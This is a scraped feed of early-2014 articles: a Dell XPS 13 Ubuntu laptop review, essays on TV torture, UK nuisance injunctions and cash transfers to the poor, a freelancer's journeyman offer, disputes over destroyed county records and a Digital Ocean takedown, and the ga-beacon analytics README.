Screen: I was a little worried that 1920x1080 would be a bit of a problem for me on a 13inch screen. But it isn't too small at all for me, I like it. The display quality looks fantastic, very crisp and the viewing angles are awesome. Going back to a 13inch MBP after a week with the XPS feels like things are very cramped on the MBP. The screen on the XPS simply offers more real estate.
As I'm writing this I'm realizing I should probably say something about the touch-functionality of the screen. I'm not really interested in this feature and I will most likely not use it at all. But it's there. I touch-clicked around a little bit just now and it seems to work.

Battery life: I find this one a bit hard to judge and give a number that will hold true for everybody, since everybody's usage patterns are different. But after having used the XPS for a full week now, here's how it's been for me: Great.
I get about 6 hours of usage from a full charge (or more if I leave my desk for breaks and the screen shuts off after 5 minutes, which saves battery). As I mentioned earlier, that's usually on the lowest (or second to lowest) screen brightness setting, with the keyboard backlight enabled for about 50-75% of the time, and having Firefox open with 5-10 tabs, sometimes YouTube running in the background for some music, some Terminal windows open, Steam open in the background, Skype running in the background and a few text editor windows open.
Running games will of course reduce the battery-time. For example, if I start up "Starbound" when the battery is full, the indicator tells me I have about 3 to 3:30 h left. It's about the same when I start a Skype-video-call with a full battery.

Touchpad: It has a nice soft-feel to it and I've been able to use it without issues so far. I like to tap-click as opposed to actually clicking down the physical button. This works fine, as well as two-finger-tapping for a right-click. Two-finger-scrolling works fine as well. (If one prefers to click down the physical button: this works perfectly fine as well, for both left and right clicks)
I noticed one thing which doesn't matter at all to me, but maybe it matters to some: Getting a right-click by one-finger-tapping (not clicking) on the pad requires you to tap at the very very very lower right corner of the pad, which I find impossible to get right on the first try. So much so that I'm actually wondering whether this is done on purpose to avoid accidental right-click-taps.

Default partitioning:

(At the point I took this screenshot all I had done were the system updates and the installation of Chrome)

What did I configure / install so far?
- Set up automatic TRIM for the SSD via daily cron-job (used this tutorial for "Scheduled TRIM")
- Ran all system updates for Ubuntu 12.04 LTS
- Chrome
- Firefox
- Steam and several games (through Steam)
- Dropbox
- SpiderOak
- Some indicators (for CPU/network activity and CPU temperature)
- Skype
- KeyPassX
- TrueCrypt

I'll install OpenShot and Blender in the next few days and play around with those.

Below are a few shots of the XPS next to a late 2013 retina MacBook Pro 13inch.

Temperature and noise: While surfing / writing / YouTube-ing / terminal-ing I felt the laptop getting warm towards the center/top of the keyboard. The fan kicked in very rarely. When it did, it didn't stay on for long and the noise was okay. When the fan is off, the machine is absolutely silent. I installed a temperature indicator and while idle, the CPU temp is about 50 degrees Celsius. (I originally wrote that it's 53 degrees, but that's wrong. I just checked it again and I must have had it wrong in my notes. It's definitely 49-50.)

A few scenarios:

- YouTube running on a background tab in Firefox while typing this review in another tab, Skype running, Terminal running, Text Editor running
CPU load is between 10 and 20 % and the temperature is 60 degrees Celsius. Fan is off (or at least inaudible)

- Same scenario as before, without YouTube, but with Starbound running through Steam
CPU load is about 36% and the temperature is about 72 degrees Celsius. Fan is on and audible, but rather low. Having the game's sound on (normal level) is louder than the fan-noise.

- To bring the CPU load up, I installed "pi" (sudo apt-get install pi) and ran instances of it in terminals by entering "pi 200000000". Each time, I let it run for about 2 minutes before writing down the result.

2 instances of pi: approx. 54% CPU, 65 degrees C, fan kicked in audibly at first, but then went to a lower level (it's still on, but I have to bring my ear very close to the laptop to actually hear it.

3 instances of pi: approx. 78% CPU, 68-69 degrees C, same fan behaviour as the previous test

4 instances of pi: approx. 100% CPU, 68-69 degrees C, same fan behviour as the previous test

Build-quality / finish: I find it great. The top of the lid is aluminium and the bottom is carbon fiber, as pictured below. Nothing is wiggling, rattling or bending.

I had noticed beforehand that the headphone port was listed as "headset port". So I was wondering if that meant headphones with an integrated microphone (such as wired headsets for cellphones) would work. Answer: Yes, they do. I plugged in an iPhone wired headset and the mic works, plug and play, no fiddling required.

Overall, this little laptop has a high quality feel to it and everything I tried worked. I'd say my experience was similar to that of a MacBook Pro. I really like the overall concept of the XPS 13 DE. It's minimalistic, yet powerful, but kind of off the mainstream. And this concept shines through from A to Z: From the packaging, the hardware, the software and the overall experience.

Getting things done in Ubuntu has been painless. Before this, I was using Windows 7 and OSX. I wasn't unhappy with those, but I really liked the concept behind "Project Sputnik". I'm willing to put a little effort into making things work, but I already have a day-job and so I'm not looking for a laptop that will require a few hours every day just to get things to work the way I expect. I want to *use* it, I don't want to have to put work into *making it useful*. And that's what this device does: It works.

For now (after a week of usage), I'm very happy with my purchase and would absolutely recommend this laptop to anybody looking for a solid, painless Ubuntu experience on a very nice laptop where things just work out of the box.

I'll update this post if anything arises.


The Rise and Rise of Television Torture :: Interpret This

$
0
0

Comments:"The Rise and Rise of Television Torture :: Interpret This"

URL:http://www.interpretthis.org/2014/01/05/the-rise-and-rise-of-television-torture


The X-Files was a reflection of its time. It ran from 1993 - 2002. Two FBI agents working on weird and unusual cases. The X-files. It also had an overall plot line that was slowly advanced in between "monster of the week" episodes. The central plot concerned an overarching conspiracy. A powerful cabal who were collaborating with alien colonisers.

It was thoughtful and often slowly paced. The central characters were in search of truth while everyone around them tried to obscure it

Fringe is a modern reincarnation of the X-Files. A special division of the FBI who is responsible for for working with "fringe" cases. The show uses the same "monster of the week" format with an overarching arc (though the monsters are often more tightly integrated into the arc itself) and the protaganists are slightly odd outsiders.

However one major difference that jumps out when you compare them is the huge amount of torture that happens in Fringe compared to the X-Files.

Torture is depicted as a tool. Sure it’s a big hammer. And maybe not appropriate to be used for every nail. But if you need to use it then of course it’s appropriate. Why wouldn’t you pull that tool out if you needed it? In fact it’s often portrayed as a moral failing to not do anything it takes to get the results you need.

Torture is used by all parties. Everyone resorts to torture, whether they are the good guys or the bad guys. Because torture is not seen as objectively bad. It is a technique for winning.

Scully and Mulder from the X-Files did not go around torturing people. And neither were they (at least not very often) tortured themselves.

But this prevalence of torture that you see in otherwise very comparable shows is not limited to Fringe. It is everywhere in American entertainment now.

Everywhere you see it it promotes the lie that torture works. It does this very effectively. Because usually we, the audience, already know that the person being tortured has the information. They just will not give it up. In real life of course torture is not like that. In the hundreds of torture scenes that have been acted out in popular media only a handful show the victim making things up, and saying whatever they think the torturer wants to hear in order that they stop torturing them. Which is the reason why torture is not a useful tool. The process would be: Torture someone, they tell you something, you double check that story, maybe torture the people they implicate, then you find it out that there story was incorrect, go back to torturing them. Just one round of that might take days or a weeks. Which would make for boring TV.

On television National Security or law enforcement, is presented as an ongoing series of life or death situations where some wrongdoer is withholding information that will save many lives if it is just some how extracted. some how. Right now some how. There is no time to think or make rational decisions.

You cannot help but link this increase to the changed attitudes towards torture in American politics. Torture has been legitimized as the only way to prevent a terrorist attack that is going to happen any minute now. When really it seems to being used to extract confessions and encourage people to give someone, anyone, else up.

Missing from the televised depictions of torture are all the other reasons why individuals or states might torture someone. Torture is used for diverse reasons (punishment, revenge, political re-education, sadistic gratification, deterrence, coercion of the victim or a third party) and to show it used for a single purpose only is very misleading.

Fringe, like many other shows (Scandal OMG), is part of the normalisation of torture. When you start actively watching out for it the prevalence of these scenes is shocking.

Not shocking just because they are uncomfortable to watch, but shocking because they are re-educating and changing attitudes towards this act. Conveniently at a time when governments have also redefined torture as something appropriate.

Other Sources

New Yorker article on the presentation of torture in scandal Taylor Marsh arguing that Scandal is actually progressive Lengthy discussion thread over on HackerNews

Hansel - 05/01/2014

Follow @hanseldunlop

Will Work For Food And Lodging - Jacques Mattheij

$
0
0

Comments:"Will Work For Food And Lodging - Jacques Mattheij"

URL:http://www.jacquesmattheij.com/will-work-for-food-and-lodging


In the past, the various professions were organized as guilds. If you wanted to become a cabinet maker you’d enter into an apprenticeship arrangement with a ‘master’ cabinetmaker and you’d be taught the tricks of the trade over a several year period. As your final examination you would be required to make a masterpiece (that’s where that word comes from) and then, if the master accepted your work you could call yourself a cabinetmaker. To avoid you setting up shop right next door and end up cannibalizing the person that taught you and to promote the flow of ideas within the guild you would then be discharged from your apprenticeship and your journeyman years started.

The journeyman years are an interesting concept. The newly minted cabinetmaker (or bricklayer, wheelwright, smith, whatever) would don travelling clothes (including a walking stick), pack up his tools and a knapsack and hit the road, travelling from town to town offering his services, telling stories and would be given food and a roof over his head during the nights. This period would last from 1 to 3 years, and upon completion the former apprentice, now journeyman would be permitted to settle in a spot that the guild had some say in and would be allowed to call himself a master.

As technology became more and more widespread the power of the guilds diminished and tradecrafts died out. In some isolated pockets of the world the journeyman concept still exists but it is really an anachronism. For instance, in Germany the carpenter trade still practices (a limited form) of the journeyman years and occasionally you can see them walking the roads or the streets there.

So, besides wishing all the readers of this blog a very happy 2014 I have an offer to make. I’ll divide 2014 into 13 equal portions of 4 weeks each. 12 of those, starting the 1st of February will have one half dedicated to the things that I normally do to make a living (maintain my websites, consultancy, technical due diligence). The other half I will give away to parties within 1,000 km from my base (Amsterdam) who think they have an interesting job for me to do. There will be no payment for this, I’ll pay for my own fuel for my trusty bus, other than in the journeymans tradition that I would expect food and lodging. Though each part will be limited to two weeks there is no reason why there could not be more parties geographically close that would all want me for a bit shorter than that so feel free to request shorter things as well.

So, if you want to take me up on this offer mail me at j@ww.com with who you are, what you (or your company) wants me to do, where you are located and if there is some specific time-frame or other conditions then you should probably tell me about that too. Every 4 week period I will select one or more of the open offers and we’ll arrange for a specific date & time to visit and work on your project.

Don’t feel too limited about the kind of work that you have, I’m pretty versatile. If any tools are required for whatever you want to do and I have them (and you don’t) then I could probably bring them with me (the bus will hold about 5 cubic meters worth of stuff), however if I don’t have the tools required then I won’t be buying them. If any materials are required then that’s your problem, and of course I would expect you to be available during the time that we agree I’ll be ‘on site’. Naturally, I reserve the right to write about my experiences on the road as well as with you / your company, suitably anonimized.

This offer does not automatically constitute an obligation to accept, I will evaluate the offers on a case-by-case basis and will select those that are in my opinion and solely at my discretion the best fit.

If you want to get an idea of what I can do the rest of this blog might give you some hand-holds. I’m not limiting this offer any more than I have to so feel free to ask me to help remodel your house but chances are that there will be something a bit more aligned with my skills. Otoh if yours is the only request and it is to help remodel your house I will probably take it :)

Some stuff I’ve done over the years: ran a mid sized company (25 employees), designed a windmill, wrote the software to help design it, built the plasmacutter/mill and associated electronics that it was made on, cad/cam software, car restoration, house rebuilding and house building, electronics design, general programming, web programming (but that’s not up to 2014 standards), general problem solving (the more difficult the bigger the chance that I’ll like the challenge :) ) and so on.

I really try to live up to my favorite line from Robert A. Heinlein’s books: “A human being should be able to change a diaper, plan an invasion, butcher a hog, conn a ship, design a building, write a sonnet, balance accounts, build a wall, set a bone, comfort the dying, take orders, give orders, cooperate, act alone, solve equations, analyze a new problem, pitch manure, program a computer, cook a tasty meal, fight efficiently, die gallantly. Specialization is for insects.”

So feel free to challenge me in unexpected ways.

[Cfrg] Response to the request to remove CFRG co-chair

160 year-old Documents Intentionally Destroyed in Franklin County, N.C. | Stumbling in the Shadows of Giants

$
0
0

Comments:"160 year-old Documents Intentionally Destroyed in Franklin County, N.C. | Stumbling in the Shadows of Giants"

URL:http://stumblingintheshadowsofgiants.wordpress.com/2013/12/21/160-year-old-documents-intentionally-destroyed-in-franklin-county-n-c/


This is one of a countless number of 19th century records seized by the North Carolina Archives and burned on December 6, 2013

I rarely re-blog, but this one deserves being spread far and wide.

Timeline of the Destruction of 100 Year Old Franklin County, NC Records

Please read the whole post included above – but the gist is as follows:

- This summer a new Clerk of Court in Franklin County discovered a trove (an entire roomful) of documents, some dating back to 1840, in a previously sealed room in the Franklin County, North Carolina Court House.

- Recognizing the historical value of these materials, she contacted the local historical society to assist in reviewing the materials, preserving them, and inventorying the materials.

- The Local historical group enthusiastically poured themselves into the project, mobilizing volunteers and the whole community – securing space to work, materials, and finances – in order to catalog and preserve the bounty of record books, photographs, deeds, chattel records, land grants, deeds, wills, personal correspondence, and countless other materials from a wide variety of government departments throughout the county. (This room had apparently become the “graveyard” for old records, and no one bothered to investigate it for many, many decades.)

- In August of this year, the Local Historians – realizing they may be beyond their depth in regard to the value of some of these materials, contacted the North Carolina Department of Archives, seeking guidance on proper preservation techniques and value assessment.

And that’s when things went hinky. The NC Archives group stepped in, pulled rank, and immediately halted all work on the project, stating that they were going to study the challenge and come up with “Next Steps”. Months passed and nothing got done, while the documents languished in the basement of the courthouse.

Then, on Friday, December 6, 2013, at 6:00 in the evening (after all the county workers had left, and with no notice to the local historical group involved in the project), a team from the North Carolina Archives swept in and confiscated ALL the materials – with the cover of Law Enforcement! They took the documents to the County Incinerator, and methodically burned EVERYTHING. They did this while a few locals stood by, not understanding why or precisely what was happening.

[CORRECTION: Added 01/06/2014 - The folks who swept in to claim and destroy the documents were NOT from the NC Archives. A team from the NC Archives did seize many boxes of documents from a workroom managed by the Franklin County Historical Society - but they were NOT directly involved in the destruction of the materials in the basement.

ADDENDUM TO THE CORRECTION: Added 01/06/2014 - A number of people have posted/emailed asking if I know what County Agency was responsible. I do not know for certain. So far conjecture leads me to the Franklin County Manager's office - but until I hear her side of the story - my opinion is uninformed except by silence. Sorry.]

Every book, deed, will – every photograph – every piece of paper in that room was incinerated that night. No explanation has been given, and no media attention has asked any questions.

Boxes of documents from the Franklin County Courthouse seized and burned by the North Carolina State Archives.

HERE’S WHAT I THINK:
After the Civil War (after emancipation), a lot of large land-owners deeded out substantial tracts of land to their former slaves. These former slaves had demonstrated to their masters that they were loyal, hard-working, and would continue to farm and contribute to the plantation collective as they always had. The only difference is that they would own the land they worked, and earn a somewhat larger income as a result of their efforts.

During reconstruction, a lot of land holders, both black and white, had difficulty paying very high property taxes imposed by Federal Occupiers. In swept speculators and investors from up North (these people have come to be known as “Carpet Baggers”.) They often forced white land owners to sell out at a fraction of the actual value of their property. In the case of black land-owners, sometimes all the Carpet Baggers offered was threats. The effect was the same – a vast transfer of wealth from titled property owners to new people who became, in the decades of the late 19th and early 20th century, among the wealthiest people in the South.

How do I know this? Some of my own ancestors were Carpet Baggers from Maryland. They made a small fortune after the war, stealing land, setting up mills, and effectively re-enslaving two or three generations of both poor-white and black natives of Halifax County, North Carolina.

My suspicion is that in and amongst all those now destroyed records, was a paper trail associated with one or more now-prominent, politically connected NC families that found its wealth and success through theft, intimidation, and outrageous corruption.

Prove me wrong. You can’t. They destroyed the records.

Shelves of record books from the Franklin County Courthouse seized and burned in December, 2013.

Like this:

LikeLoading...

DEMONS

Digital Ocean said it would shut down my blog if I didn’t remove or edit a blog post. | vpsexperience

$
0
0

Comments:"Digital Ocean said it would shut down my blog if I didn’t remove or edit a blog post. | vpsexperience"

URL:http://vpsexperience.wordpress.com/2014/01/05/digital-ocean-threatened-to-shut-down-my-blog-if-i-didnt-remove-or-edit-a-blog-post/


This is a story about how the VPS provider Digital Ocean required me to either delete a blog post or make it anonymous by removing any reference to the person I was writing about. If I refused to do it, Digital Ocean said they would terminate my account. The person I wrote about (Googler Travis Collins) in the blog post happened to be a friend of a Digital Ocean executive, but Digital Ocean said the only reason the blog post needed to be removed was due to a terms of service violation. Here’s the blog post in its original form. I describe below how this whole incident came to pass and provide screenshots of Digital Ocean’s communications. Digital Ocean promotes itself as a great place to setup a blog, and they provide instructions to make it easy for you, but you might want to learn how Digital Ocean applies its terms of service before investing a lot of time in writing blog posts.

A couple weeks ago I decided to set up a WordPress blog on a VPS provided by Digital Ocean. I didn’t have specific plans to write about anything in particular but since I’m trying to retrain as a developer there would probably be a tech angle to most of what I published. One potential story idea arose when I was hanging out on another site hosted on and sponsored by Digital Ocean, chat meatspace. Chat Meatspace is one of Digital Ocean’s so-called #TopDrops It’s a site where a lot of “alpha geeks” hang out (as Tech Crunch describes them), including several high profile members of the JavaScript community, the Chief Technology Evangelist for Digital Ocean, and at least two Googlers that I knew of, one being a guy named Travis Collins. It’s a very small community and the people are all chummy with each other.

One day, as I was lurking on Meatspace, I saw the Googler Travis Collins turn up and decided to ask his opinion about a story that Gawker had published about how Google treats its contract employees. I gave him the link to the story and he provided some very candid responses, which I took screenshots of and used to write up this blog post. Travis had no idea that I intended to write up a blog post, and, indeed, I had no real plans to write a blog post until Travis gave me his response, which I thought was somewhat newsworthy since he works for the company that was the subject of the other story. After he gave me his responses, he decided to mute me on the site, so it was impossible to communicate with him and let him know that a blog post was going to be published. My act of taking his statements and publishing them is the same as everyone does when they quote something someone says on Twitter. It’s fair game to republish something in the public domain.

Several days later, after TechCrunch published its story about Meatspace, the Meatspace community discovered my blog post via a comment on TechCrunch and were really angry about it. I happened to be lurking on Meatspace as they were discussing it and took screenshots of things they said about it and me. One member of the community half-seriously (I assumed) threatened to harm me, proposing to “Godwins law this fucker.” Screenshot, a reference to the practice of accusing someone of being a Nazi sympathizer in internet discussions. See Wikipedia entry here. Another member of the community, who was present and very suspicious as I asked Travis Collins the questions about the Gawker story, had taken note of my browser “fingerprint” and was now offering to share it with everyone. fingerprint screenshot

Interestingly, when the Meatspace community asked Travis Collins about the blog post, he said he didn’t care. “Meh, whatever,” were his words. Here’s a screenshot of the question being asked and here’s a screenshot of Travis Collins’ response

The next day, however, I received notification from Digital Ocean about an abuse complaint, which purportedly came from Travis Collins. The complaint claimed that I had been harassing Travis Collins online and the blog post was part of that larger pattern of harassment. Here’s the complaint.

The most outrageous part of this abuse complaint is that it claimed that I had been harassing and following Travis Collins around online. This is easily proven false because Travis Collins admitted that he had no idea who I was as I spoke to him on Meatspace. Here’s a screenshot of Travis Collins admitting that he had no idea who I was as I spoke to him on Meatspace.
I pointed this fact out to Digital Ocean but they just ignored it, even when I also showed them that other members of the Meatspace community expressed an interest in harming my reputation (i.e. Godwins law this fucker).

Anyways, when signing up for Digital Ocean, my assumption that if a person has a complaint about content, the VPS provider would ask them to contact the publisher (me) rather than the VPS provider trying to mediate between the person with the complaint and the publisher. I asked Digital Ocean to have Travis Collins contact me and they just ignored it.

When I asked Digital Ocean how my blog post violated the terms of service, they quoted one clause from the ToS but didn’t explain how my content violated it.

In reply, I pointed out to Digital Ocean that Travis Collins didn’t actually care about the blog post and I provided the screenshot of Travis Collins’ response to prove it.

Second, I also pointed out how the complaint contained a lie. How was it possible that I had been harassing and following Travis Collins around online if it was also true, as Travis admitted, that he had no idea who I was?

I therefore suggested to Digital Ocean that Travis Collins wasn’t telling the truth about being embarrassed, or that the person who made the complaint wasn’t actually Travis Collins but one of the other Meatspacers who expressed an interest in harming me. I gave them the screenshots of the Meatspace users talking about defaming me with Godwins law.

Digital Ocean didn’t listen to anything I said. They required me to either remove the blog post entirely or to make it “anonymous.” They said that my story was “targeting” Travis Collins and that I could easily remove any reference to Travis Collins and still make the same point. In fact they said that my unwillingness to make the blogpost anonymous lends credibility to Travis’ complaint, which ignored the fact that it likely wasn’t even Travis who made the complaint. Digital Ocean required me to provide legal documentation to show that I could publish the blog post. They said they would gladly respond to an injunction from a New York court! This was obviously very difficult for me to do since I’m not even in the United States!

Digital Ocean promotes itself as a great place to setup a WordPress or Ghost blog, and they provide very clear instructions how to do it, but you should carefully consider their terms of service and the content you plan on publishing, or you might end up wasting a lot of your time and their time.

By the way, I sent an email to Travis Collins and asked him if he made the complaint and he never replied!

If you’re really interested, here’s the whole series of communications.

First. The complaint

My initial response with their reply quoting the terms of service

I object that they haven’t explained how I violated the terms of service, and also point out that Travis didn’t even care about the post

their response

I initially refuse and point out how the Meatspace community said it was going to harm me

I provide them more info on Godwins law

I pointed out how the person claiming to be Travis lied about me harassing him

they respond by saying it was clearly a ToS violation and provide me two options, to make the post anonymous or remove it

I offer to remove the words “obnoxious” and “bratty” from my post and re-iterate several points they didn’t respond to

I show them why it’s likely that Travis didn’t even make the complaint

They tell me I must comply

After I pointed out again that it likely wasn’t even Travis who made the complaint, they respond by claiming the complaint had merit and they’d take action on my account if I didn’t comply with their demands

I ask them to clarify what action on my account means, and they tell me my droplet would be powered down and my account locked down

They explain that locked down means ‘terminated’

Like this:

LikeLoading...

igrigorik/ga-beacon · GitHub

$
0
0

Comments:"igrigorik/ga-beacon · GitHub"

URL:https://github.com/igrigorik/ga-beacon


Google Analytics for GitHub

Curious which of your GitHub projects are getting all the traffic, or if anyone is reading your GitHub wiki pages? Well, that's what Google Analytics is for! GitHub does not allow us to install arbitrary analytics, but we can still use a simple tracking image to log visits in real-time to Google Analytics - for full details, follow the instructions below. Once everything is setup, install this custom dashboard in your account for a nice real-time overview (as shown in above screenshot).

Note: GitHub finally released traffic analytics on Jan 7, 2014 -- wohoo! As a result, you can get most of the important insights by simply using that. If you still want real-time analytics, or an integration with your existing GA analytics, then you can use both the tracking pixel and built-in analytics.

Setup instructions

First, log in to your Google Analytics account and set up a new property:

  • Select "Website", use new "Universal Analytics" tracking
  • Website name: anything you want (e.g. GitHub projects)
  • WebSite URL: https://ga-beacon.appspot.com/
  • Click "Get Tracking ID", copy the UA-XXXXX-X ID on next page

Next, add a tracking image to the pages you want to track:

  • https://ga-beacon.appspot.com/UA-XXXXX-X/your-repo/page-name
  • UA-XXXXX-X should be your tracking ID
  • your-repo/page-name is an arbitrary path. For best results specify the repository name and the page name - e.g. if you have multiple readme's or wiki pages you can use different paths to map them to same repo: your-repo/readme, your-repo/other-page, and so on!

Example tracker markup if you are using Markdown:

[![Analytics](https://ga-beacon.appspot.com/UA-XXXXX-X/your-repo/page-name)](https://github.com/igrigorik/ga-beacon)

Or RDoc:

{<img src="https://ga-beacon.appspot.com/UA-XXXXX-X/your-repo/page-name" />}[https://github.com/igrigorik/ga-beacon]

If you prefer, you can skip the badge and use a transparent pixel. To do so, simply append ?pixel to the image URL.

And that's it, add the tracker image to the pages you want to track and then head to your Google Analytics account to see real-time and aggregated visit analytics for your projects!

FAQ

  • How does this work? GitHub does not allow arbitrary JavaScript to run on its pages. As a result, we can't use standard analytics snippets to track visitors and pageviews. However, Google Analytics provides a measurement protocol which allows us to POST the visit data directly to Google servers, and that's exactly what GA Beacon does: we include an image request on our pages which hits the GA Beacon service, and GA Beacon POST's the visit to Google Analytics to record the visit.

  • Why do we need to proxy? Google Analytics supports reporting of visit data via GET requests, but unfortunately we can't use that directly because we need to generate and report a unique visitor ID for each hit - GitHub does not allow us to run JS on the client to generate the ID. To address this, we proxy the request through ga-beacon.appspot.com, which in turn is responsible for generating the unique visitor ID (server generated UUID) and reporting the hit to Google Analytics.

  • What about referrals and other visitor information? Unfortunately the static tracking pixel approach limits the information we can collect about the visit. For example, referral information is only available on the GitHub page itself and can't be passed to the tracking pixel. As a result, the available metrics are restricted to unique visitors, pageviews, and the User-Agent of the visitor.

  • Can I use this outside of GitHub? Yep, you certainly can. It's a generic beacon service.


At last, a law to stop almost anyone from doing almost anything | George Monbiot | Comment is free | The Guardian

$
0
0

Comments:" At last, a law to stop almost anyone from doing almost anything | George Monbiot | Comment is free | The Guardian "

URL:http://www.theguardian.com/commentisfree/2014/jan/06/law-to-stop-eveyone-everything


Until the late 19th century much of our city space was owned by private landlords. Squares were gated, streets were controlled by turnpikes. The great unwashed, many of whom had been expelled from the countryside by acts of enclosure, were also excluded from desirable parts of town.

Social reformers and democratic movements tore down the barriers, and public space became a right, not a privilege. But social exclusion follows inequality as night follows day, and now, with little public debate, our city centres are again being privatised or semi-privatised. They are being turned by the companies that run them into soulless, cheerless, pasteurised piazzas, in which plastic policemen harry anyone loitering without intent to shop.

Street life in these places is reduced to a trance-world of consumerism, of conformity and atomisation in which nothing unpredictable or disconcerting happens, a world made safe for selling mountains of pointless junk to tranquillised shoppers. Spontaneous gatherings of any other kind – unruly, exuberant, open-ended, oppositional – are banned. Young, homeless and eccentric people are, in the eyes of those upholding this dead-eyed, sanitised version of public order, guilty until proven innocent.

Now this dreary ethos is creeping into places that are not, ostensibly, owned or controlled by corporations. It is enforced less by gates and barriers (though plenty of these are reappearing) than by legal instruments, used to exclude or control the ever widening class of undesirables.

The existing rules are bad enough. Introduced by the 1998 Crime and Disorder Act, antisocial behaviour orders (asbos) have criminalised an apparently endless range of activities, subjecting thousands – mostly young and poor – to bespoke laws. They have been used to enforce a kind of caste prohibition: personalised rules which prevent the untouchables from intruding into the lives of others.

You get an asbo for behaving in a manner deemed by a magistrate as likely to cause harassment, alarm or distress to other people. Under this injunction, the proscribed behaviour becomes a criminal offence. Asbos have been granted which forbid the carrying of condoms by a prostitute, homeless alcoholics from possessing alcohol in a public place, a soup kitchen from giving food to the poor, a young man from walking down any road other than his own, children from playing football in the street. They were used to ban peaceful protests against the Olympic clearances.

Inevitably, more than half the people subject to asbos break them. As Liberty says, these injunctions "set the young, vulnerable or mentally ill up to fail", and fast-track them into the criminal justice system. They allow the courts to imprison people for offences which are not otherwise imprisonable. One homeless young man was sentenced to five years in jail for begging: an offence for which no custodial sentence exists. Asbos permit the police and courts to create their own laws and their own penal codes.

All this is about to get much worse. On Wednesday the Antisocial Behaviour, Crime and Policing Bill reaches its report stage (close to the end of the process) in the House of Lords. It is remarkable how little fuss has been made about it, and how little we know of what is about to hit us.

The bill would permit injunctions against anyone of 10 or older who "has engaged or threatens to engage in conduct capable of causing nuisance or annoyance to any person". It would replace asbos with ipnas (injunctions to prevent nuisance and annoyance), which would not only forbid certain forms of behaviour, but also force the recipient to discharge positive obligations. In other words, they can impose a kind of community service order on people who have committed no crime, which could, the law proposes, remain in force for the rest of their lives.

The bill also introduces public space protection orders, which can prevent either everybody or particular kinds of people from doing certain things in certain places. It creates new dispersal powers, which can be used by the police to exclude people from an area (there is no size limit), whether or not they have done anything wrong.

While, as a result of a successful legal challenge, asbos can be granted only if a court is satisfied beyond reasonable doubt that antisocial behaviour took place, ipnas can be granted on the balance of probabilities. Breaching them will not be classed as a criminal offence, but can still carry a custodial sentence: without committing a crime, you can be imprisoned for up to two years. Children, who cannot currently be detained for contempt of court, will be subject to an inspiring new range of punishments for breaking an ipna, including three months in a young offenders' centre.

Lord Macdonald, formerly the director of public prosecutions, points out that "it is difficult to imagine a broader concept than causing 'nuisance' or 'annoyance'". The phrase is apt to catch a vast range of everyday behaviours to an extent that may have serious implications for the rule of law". Protesters, buskers, preachers: all, he argues, could end up with ipnas.

The Home Office minister, Norman Baker, once a defender of civil liberties, now the architect of the most oppressive bill pushed through any recent parliament, claims that the amendments he offered in December will "reassure people that basic liberties will not be affected". But Liberty describes them as "a little bit of window-dressing: nothing substantial has changed."

The new injunctions and the new dispersal orders create a system in which the authorities can prevent anyone from doing more or less anything. But they won't be deployed against anyone. Advertisers, who cause plenty of nuisance and annoyance, have nothing to fear; nor do opera lovers hogging the pavements of Covent Garden. Annoyance and nuisance are what young people cause; they are inflicted by oddballs, the underclass, those who dispute the claims of power.

These laws will be used to stamp out plurality and difference, to douse the exuberance of youth, to pursue children for the crime of being young and together in a public place, to help turn this nation into a money-making monoculture, controlled, homogenised, lifeless, strifeless and bland. For a government which represents the old and the rich, that must sound like paradise.

Twitter: @georgemonbiot

A fully referenced version of this article can be found at monbiot.com

Why we should give free money to everyone

$
0
0

Comments:"Why we should give free money to everyone"

URL:https://decorrespondent.nl/541/why-we-should-give-free-money-to-everyone/31639050894-e44e2c00


London, May 2009.Read the Dutch version here / Lees de Nederlandse versie van dit artikel hier. A small experiment involving thirteen homeless men takes off. They are street veterans. Some of them have been sleeping on the cold tiles of The Square Mile, the financial center of the world, for more than forty years. Their presence is far from cheap. Police, legal services, healthcare: the thirteen cost taxpayers hundreds of thousands of pounds. Every year.

That spring, a local charity takes a radical decision. The street veterans are to become the beneficiaries of an innovative social experiment. No more food stamps, food kitchen dinners or sporadic shelter stays for them. The men will get a drastic bailout, financed by taxpayers. They'll each receive 3,000 pounds, cash, with no strings attached. The men are free to decide what to spend it on; counseling services are completely optional. No requirements, no hard questions. The only question they have to answer is:

What do you think is good for you?

Gardening classes

‘I didn’t have enormous expectations,’ an aid worker recalls.

Yet the desires of the homeless men turned out to be quite modest. A phone, a passport, a dictionary - each participant had his own ideas about what would be best for him. None of the men wasted their money on alcohol, drugs or gambling. On the contrary, most of them were extremely frugal with the money they had received. On average, only 800 pounds had been spent at the end of the first year. 

Simon’s life was turned upside down by the money. Having been addicted to heroine for twenty years, he finally got clean and began with gardening classes. ‘For the first time in my life everything just clicked, it feels like now I can do something’, he says. ‘I’m thinking of going back home. I’ve got two kids.’

A year after the experiment had started, eleven out of thirteen had a roof above their heads. They accepted accommodation, enrolled in education, learnt how to cook, got treatment for drug use, visited their families and made plans for the future. ‘I loved the cold weather,’ one of them remembers. ‘Now I hate it.’ After decades of authorities’ fruitless pushing, pulling, fines and persecution, eleven notorious vagrants finally moved off the streets. The Joseph Rowntree Foundation did a study of this experiment.

Costs? 50,000 pounds a year, including the wages of the aid workers. In addition to giving eleven individuals another shot at life, the project had saved money by a factor of at least 7. Even The Economist concluded:

‘The most efficient way to spend money on the homeless might be to give it to them.’

Santa exists

We tend to presume that the poor are unable to handle money. If they had any, people reason, they would probably spend it on fast food and cheap beer, not on fruit or education. This kind of reasoning nourishes the myriad of social programs, administrative jungles, armies of program coordinators and legions of supervising staff that make up the modern welfare state. Since the start of the crisis, the number of initiatives battling fraud with benefits and subsidies has surged.

People have to ‘work for their money,’ we like to think. In recent decades, social welfare has become geared toward a labor market that does not create enough jobs. The trend from 'welfare' to 'workfare' is international, with obligatory job applications, reintegration trajectories, mandatory participation in 'voluntary' work. The underlying message: Free money makes people lazy.

Except that it doesn’t. 

Meet Bernard Omandi. For years he worked in a quarry, somewhere in the inhabitable West of Kenya. Bernard made $2 a day, until one morning, he received a remarkable text message. 'When I saw the message, I jumped up', he later recalled. And with good reason: $500 had just been deposited into his account. For Bernard, the sum amounted to almost a year’s salary. 

A couple of months later a New York Times reporter walkedRead the NYT article here.around his village. It was like everyone had won the jackpot - but no one had wasted the money. People were repairing their homes and starting small businesses. Bernard was making $6 to $9 a day driving around on his new Bajai Boxer, an Indian motor cycle which he used to provide transportation for local residents. ‘This puts the choice in the hands of the poor, and not me,' Michael Faye, co-founder of GiveDirectly, the coordinating organization, said. ‘The truth is, I don’t think I have a very good sense of what the poor need.’ When Google had a look at his data, the company immediately decided to donate $2.5 million.

